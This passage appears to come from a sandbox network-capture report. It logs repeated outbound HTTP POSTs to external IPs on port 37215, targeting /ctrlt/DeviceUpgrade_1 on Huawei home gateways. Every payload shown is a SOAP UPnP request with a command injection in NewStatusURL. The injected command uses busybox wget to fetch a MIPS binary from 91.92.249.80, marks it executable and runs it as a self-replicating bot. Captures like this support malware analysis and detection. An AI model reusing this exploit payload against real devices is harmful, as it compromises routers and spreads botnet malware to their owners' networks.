                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2421192.168.2.234518241.65.87.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.692095041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2422192.168.2.234656041.198.141.10637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.692111969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2423192.168.2.234117041.156.152.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.692795992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2424192.168.2.2351564157.207.34.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.693310976 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2425192.168.2.2342124157.51.247.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.693322897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2426192.168.2.235484841.149.80.17937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.694298029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2427192.168.2.2347782197.4.37.24537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.695732117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2428192.168.2.235045841.127.141.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.695779085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2429192.168.2.2358326157.236.220.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.695779085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2430192.168.2.2347414197.165.156.4837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.695827007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
